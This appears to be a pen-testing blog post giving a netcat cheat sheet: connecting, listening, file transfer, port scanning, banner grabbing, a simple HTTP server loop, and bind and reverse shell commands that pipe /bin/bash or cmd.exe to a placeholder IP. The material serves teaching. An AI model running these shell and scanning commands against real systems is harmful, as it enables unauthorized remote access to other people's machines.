Categories: hackinglinuxwindows

Netcat – the net kitty!

Netcat is a tiny tool for linux and windows and it is used for reading and writing data across network connections using TCP or UDP. It has amazing features and it is a must-have tool for pen-testing. It is called the “Swiss-army knife for TCP/IP”.

Netcat is a terminal application with many features. Apart from basic telnet functions, it can do various other things like port scanning, banner grabbing, creating socket servers to listen for incoming connections on ports, transfer files from the terminal, etc.

netcat help page

Basic Commands

TCP Port – Connecting (adding -u will force udp)
nc -nv <ip> <port>

TCP Port – Listening (adding -u will force udp)
nc -lvp <port>

Connect and return HTTP Page
nc -nv 80 HEAD / HTTP/1.1

File Transfer

nc -lvp 4444 > output.txt # Receivers side
nc -nv <ip> <port> < input.txt # Senders side

Port Scanning

nc -zv <site.com> 80-84

Banner Grabbing

echo "" | nc -nv -w1 <ip> <port>

Remote shell

Target:
nc -vlp 7777 -e /bin/bash (linux)
nc -vlp 7777 -e cmd.exe (windows)

Remote:
nc <ip> 7777

Reverse Shell

Remote:
$ nc -v -l -p 8888
Target:
nc <ip> 8888 -e /bin/bash (linux)
nc <ip> 8888 -e cmd.exe (windows)

HTTP Server

while true; do nc -l -p 80 -q 1 < index.html; done
Create an ‘index.html’:
<!doctype html>
<html>
Hello world
</html>

Extra resource:
-SANS Netcat Cheatsheet -> Download

panosnet

Share
Published by
panosnet

Recent Posts

Critical Ingress Nightmare: Unauthenticated Remote Code Execution Vulnerabilities in Kubernetes NGINX Controller Demand Immediate Action

Critical Security Flaws Uncovered in Ingress NGINX Controller: Act Now to Protect Your Kubernetes Clusters.…

3 weeks ago

Apache Tomcat CVE-2025-24813: Understanding and Mitigating the Remote Code Execution Threat

Introduction: A serious vulnerability, identified as CVE-2025-24813, has been disclosed in Apache Tomcat, a widely…

3 weeks ago

Linux Maintainers Infected by SSH-Dwelling Backdoor: A Two-Year Compromise

Introduction In a shocking revelation, it has been disclosed that the infrastructure used to maintain…

11 months ago

Cryptic Bitcoin Transaction Unfolds: Revisiting Satoshi Nakamoto’s Genesis Wallet in a $1.17 Million Transaction

Introduction: In the early hours of January 5, the cryptocurrency community was abuzz with speculation…

1 year ago

Emerging Threat: SMTP Smuggling Exploits Flaws in Major Email Servers – how to spoof like a pro!

Summary: A newly identified technique called SMTP smuggling poses a significant threat to email security…

1 year ago

Unraveling the Operation Triangulation Spyware: A Deep Dive into iPhone Exploits

Since 2019, the Operation Triangulation spyware has targeted iPhone devices, exploiting undocumented features within Apple…

1 year ago

This website uses cookies.